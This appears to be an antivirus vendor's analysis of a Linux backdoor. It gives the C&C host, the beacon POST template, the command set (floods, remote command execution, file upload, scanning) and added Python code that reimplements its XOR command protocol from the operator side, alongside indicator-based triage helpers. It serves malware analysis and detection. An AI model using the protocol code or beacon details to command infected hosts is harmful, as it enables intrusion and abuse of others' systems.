Linux.BackDoor.Xudp.1

Added to the Dr.Web virus database: 2016-03-15

Virus description added:

SHA1

  • 3a5f73d9beb74ee017965fa8922b2228fb684816

A backdoor for Linux that is installed by other downloader Trojans. The main module is located in the /lib/ folder, and persistence is provided by an entry in the cron scheduler. During installation the Trojan clears the iptables rule set.

Once launched, Linux.BackDoor.Xudp.1 decrypts configuration data hard-coded in its body. The decrypted configuration looks as follows:

dr0id1.xyz          ; C&C server
transfer.php        ; page to which requests are sent
XorUDP              ; name of the backdoor, used as the User-Agent when
                      generating requests
300                 ; HTTP sleep time
5                   ; keepalive sleep time
/bin/socket         ; NewProcName
1                   ; usemutex
700                 ; low end of the UDP port range
800                 ; high end of the UDP port range

Encrypted strings are stored and sent as follows:

<length>:<encrypted value>
10:09Ц<о*.Йs

(The value after the colon is binary; the characters above are how the sample's bytes render as text.)

If the NewProcName parameter has a non-zero value, the Trojan renames its process to the name specified in the configuration (here /bin/socket), so that it does not stand out in the process list.

If the usemutex parameter is also non-zero, the Trojan locks the file /var/.mutexlock so that only one instance runs at a time. If it fails to acquire the lock, it exits.

The Trojan then generates a 128-byte key, selects a UDP port from the configured range (700 to 800 in this sample), and starts three threads: HTTP_Thread, UDP_Listen and UDP_KeepAlive.

HTTP_Thread

When this thread starts, the Trojan sends the generated key, the chosen UDP port and the backdoor's version to the server. It then periodically sends the following POST request to the configured page:

template1 = "k=%s&p=%s&v=%s&s=1"
param1 = encodenum(ourKey)
param2 = encodenum(udpPort)
param3 = encodenum(version)
params = template1 % (param1,param2, param3)
request = "POST /%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s"
actualRequest = request % (page, host, name, len(params), params)

The server replies with one of four messages, identified by the first two bytes:

First 2 bytes    Function
00               Install client_key, client_port and client_ip
01               Execute a command
02               Reset client_key, client_port and client_ip
03               Terminate execution

Every instruction is first decrypted with the key generated by the backdoor (ourKey); the resulting buffer is then decrypted with client_key:

XOR(msg, len, ourKey);
XOR(msg, len, &client_key);
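The record framing and the two XOR layers above, worked through as an added example (this is not the backdoor's code or Dr.Web's). It assumes, because the page does not say, that XOR() is a repeating-key XOR over the buffer, that the length prefix counts the ciphertext bytes after the colon, that the opcode is the two ASCII digits shown in the table, and it uses a made-up client_key and a made-up derivation for the 128-byte ourKey:

```python
# Added example: '<length>:<encrypted value>' framing and the ourKey/client_key XOR layers.
# Not the backdoor's own code. Assumptions: repeating-key XOR, ASCII-digit opcodes,
# constructed keys (OUR_KEY is 128 bytes as on the page, but its contents are made up).

OPCODES = {
    b"00": "install client_key, client_port, client_ip",
    b"01": "execute a command",
    b"02": "reset client_key, client_port, client_ip",
    b"03": "terminate execution",
}

OUR_KEY = bytes((i * 73 + 11) & 0xFF for i in range(128))   # constructed 128-byte key
CLIENT_KEY = b"constructed-key!"                             # constructed client_key


def xor_buf(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, mirroring XOR(msg, len, key). Self-inverse."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_record(value: bytes) -> bytes:
    """Frame a ciphertext as '<length>:<encrypted value>'."""
    return b"%d:%s" % (len(value), value)


def parse_record(blob: bytes) -> bytes:
    """Parse '<length>:<encrypted value>'; reject malformed or truncated frames
    instead of reading past the end of the buffer."""
    head, sep, body = blob.partition(b":")
    if not sep or not head.isdigit():
        raise ValueError("malformed record")
    n = int(head)
    if len(body) < n:
        raise ValueError("truncated record")
    return body[:n]


def decrypt_instruction(record: bytes, our_key: bytes, client_key: bytes):
    """Client side: strip the frame, undo the ourKey layer, then the client_key layer,
    and split the 2-byte opcode from its payload."""
    buf = parse_record(record)
    buf = xor_buf(buf, our_key)      # XOR(msg, len, ourKey)
    buf = xor_buf(buf, client_key)   # XOR(msg, len, &client_key)
    opcode, payload = buf[:2], buf[2:]
    return OPCODES.get(opcode, "unknown"), payload


def encrypt_instruction(opcode: bytes, payload: bytes, our_key: bytes, client_key: bytes) -> bytes:
    """Server side of the same scheme: apply client_key, then ourKey, then frame."""
    plain = opcode + payload
    return encode_record(xor_buf(xor_buf(plain, client_key), our_key))


if __name__ == "__main__":
    rec = encrypt_instruction(b"01", b"uname -a", OUR_KEY, CLIENT_KEY)
    print(rec[:3], decrypt_instruction(rec, OUR_KEY, CLIENT_KEY))
```

Two repeating-key XOR layers compose into a single repeating keystream, so the second layer adds no strength beyond the first; and because the backdoor transmits its own key in the first POST (the k= parameter), anyone who captured that beacon and knows the encodenum transform can strip the ourKey layer from every later reply.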

UDP_Listen

Datagrams that do not come from client_ip are ignored, and nothing is done while client_key is not set. An incoming UDP message is decrypted and has the following format:

<handler>:<transaction_id> <command>

Field             Function
transaction_id    Message ID (msg_id). Every received msg_id is stored, and a command is executed only if its msg_id has not been seen before.
handler           8-byte command identifier
command           Arbitrary string (the command's argument)
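The checks the UDP_Listen thread applies before a command runs, as an added example (not the backdoor's code): source-IP filter, client_key present, decrypt, parse the <handler>:<transaction_id> <command> format, and drop replayed msg_ids. It also models the two bookkeeping commands listed below (reporting unprocessed msg_ids below the current one, and marking msg_ids as processed). It assumes, because the page does not say, that the datagram is XOR-decrypted with client_key and that msg_ids count from 1; the handler name, addresses and key are made up:

```python
import re

# Added example of the UDP_Listen filtering and parsing. Not the backdoor's own code.
# Assumptions: datagram is XOR-decrypted with client_key; msg_ids start at 1;
# the handler name, IP addresses and key in the tests are constructed.

# <handler> is exactly 8 bytes, <transaction_id> is decimal, <command> is optional free text
MSG_RE = re.compile(rb"^(?P<handler>.{8}):(?P<msg_id>\d+)(?: (?P<command>.*))?$", re.S)


def xor_buf(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, self-inverse (same small helper as in the HTTP example above)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


class UdpListener:
    def __init__(self, client_ip, client_key=None):
        self.client_ip = client_ip
        self.client_key = client_key   # installed by opcode 00, cleared by opcode 02
        self.seen_ids = set()          # every msg_id received or marked processed

    def handle(self, src_ip, datagram):
        """Return ('run', handler, msg_id, command) if the datagram would be executed,
        otherwise ('drop', reason)."""
        if src_ip != self.client_ip:
            return ("drop", "not from client_ip")
        if not self.client_key:
            return ("drop", "client_key not set")
        plain = xor_buf(datagram, self.client_key)
        m = MSG_RE.match(plain)
        if m is None:
            return ("drop", "malformed")
        msg_id = int(m["msg_id"])
        if msg_id in self.seen_ids:
            return ("drop", "duplicate msg_id")
        self.seen_ids.add(msg_id)
        return ("run", m["handler"], msg_id, m["command"] or b"")

    def missing_below(self, current_id):
        """msg_ids lower than current_id that were never processed: the list the backdoor
        reports back when asked."""
        return [i for i in range(1, current_id) if i not in self.seen_ids]

    def mark_processed(self, ids):
        """The 'mark msg_id as processed' command: stop reporting these ids as missing."""
        self.seen_ids.update(ids)


def build_datagram(handler: bytes, msg_id: int, command: bytes, client_key: bytes) -> bytes:
    """Operator side: frame and encrypt one command the way handle() expects it."""
    if len(handler) != 8:
        raise ValueError("handler must be exactly 8 bytes")
    return xor_buf(b"%s:%d %s" % (handler, msg_id, command), client_key)


if __name__ == "__main__":
    key = b"constructed-key!"
    listener = UdpListener("198.51.100.7", key)
    d = build_datagram(b"CMD00001", 3, b"uname -a", key)   # CMD00001 is a made-up handler
    print(listener.handle("203.0.113.9", d))   # wrong source -> dropped
    print(listener.handle("198.51.100.7", d))  # executed
    print(listener.handle("198.51.100.7", d))  # replay -> dropped
    print(listener.missing_below(3))           # [1, 2]
```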

The backdoor can execute the following commands:

  • Starts a flood (repeatedly sending requests to a remote server)
  • Stops the flood
  • Executes a received command with the system() function
  • Runs a received string with the popen() function and returns the command's output
  • Opens a listening UDP socket and logs every datagram received on that port to a specified file in the <ipaddr> <size> <List Port> format
  • Sends a specified file in chunks of a given size at a given time interval
  • Scans a specified range of IP addresses
  • Sends the list of msg_ids lower than the current message's msg_id that have not been processed
  • Marks the sent msg_ids as processed
  • Terminates execution

UDP_KeepAlive

The malware periodically sends a specific datagram to the server to signal that it is still active.

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.
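Besides a scan, the host and network indicators given in the description above (a cron entry launching the main module from /lib/, a process presenting itself as /bin/socket, the /var/.mutexlock lock file, and POSTs to transfer.php with User-Agent XorUDP or to dr0id1.xyz) can be checked directly. The triage helpers below are an added example, not Dr.Web's tooling; the cron lines, process table, proxy log and file list are constructed sample data, and the executable name /lib/udpd in them is made up:

```python
import re

# Added triage helpers for the indicators listed in the description. Example code, not
# Dr.Web's. All sample data below is constructed; /lib/udpd is a made-up file name.

C2_HOST = "dr0id1.xyz"
C2_PAGE = "transfer.php"
USER_AGENT = "XorUDP"
MUTEX_PATH = "/var/.mutexlock"
PROC_NAME = "/bin/socket"


def suspicious_cron(lines):
    """Cron entries that run a binary straight out of /lib/ (where the main module lives).
    Comments and blank lines are skipped. Such entries are rare but not impossible on a
    clean host, so review hits by hand."""
    return [l.strip() for l in lines
            if l.strip() and not l.lstrip().startswith("#")
            and re.search(r"(^|\s)/lib/\S+", l)]


def suspicious_processes(procs):
    """procs: (pid, argv0, resolved_exe). NewProcName only rewrites the visible name, so a
    process that calls itself /bin/socket while its executable resolves elsewhere is flagged."""
    return [(pid, argv0, exe) for pid, argv0, exe in procs
            if argv0 == PROC_NAME and exe != PROC_NAME]


def suspicious_http(lines):
    """Proxy or web-server log lines matching the beacon: a POST to transfer.php with
    User-Agent XorUDP, or any request naming the C&C host."""
    return [l for l in lines
            if C2_HOST in l or (USER_AGENT in l and C2_PAGE in l and "POST" in l)]


def mutex_present(existing_paths):
    """True if the lock file created when usemutex=1 exists."""
    return MUTEX_PATH in set(existing_paths)


def triage(cron_lines, procs, http_lines, existing_paths):
    """Collect every indicator that fired; an empty dict means nothing from the list matched."""
    hits = {}
    c = suspicious_cron(cron_lines)
    if c:
        hits["cron"] = c
    p = suspicious_processes(procs)
    if p:
        hits["processes"] = p
    h = suspicious_http(http_lines)
    if h:
        hits["http"] = h
    if mutex_present(existing_paths):
        hits["mutex"] = MUTEX_PATH
    return hits


# Constructed sample data (not output from a real host)
SAMPLE_CRON = [
    "# m h dom mon dow user command",
    "0 3 * * * root /usr/bin/updatedb",
    "*/5 * * * * root /lib/udpd >/dev/null 2>&1",
]
SAMPLE_PROCS = [
    (1, "/sbin/init", "/sbin/init"),
    (1337, "/bin/socket", "/lib/udpd"),
]
SAMPLE_HTTP = [
    '203.0.113.5 - - [15/Mar/2016:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Mar/2016:10:05:00 +0000] "POST /transfer.php HTTP/1.0" 200 2 "-" "XorUDP"',
]
SAMPLE_PATHS = ["/etc/passwd", "/var/.mutexlock"]

if __name__ == "__main__":
    for name, hit in triage(SAMPLE_CRON, SAMPLE_PROCS, SAMPLE_HTTP, SAMPLE_PATHS).items():
        print(name, hit)
```

On a live host, feed the functions the contents of /etc/crontab and /etc/cron.d/*, a process table with /proc/PID/exe resolved, and the proxy log; the cron and process checks are the strongest of the four, since the lock file and User-Agent are trivial for a new build to change.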
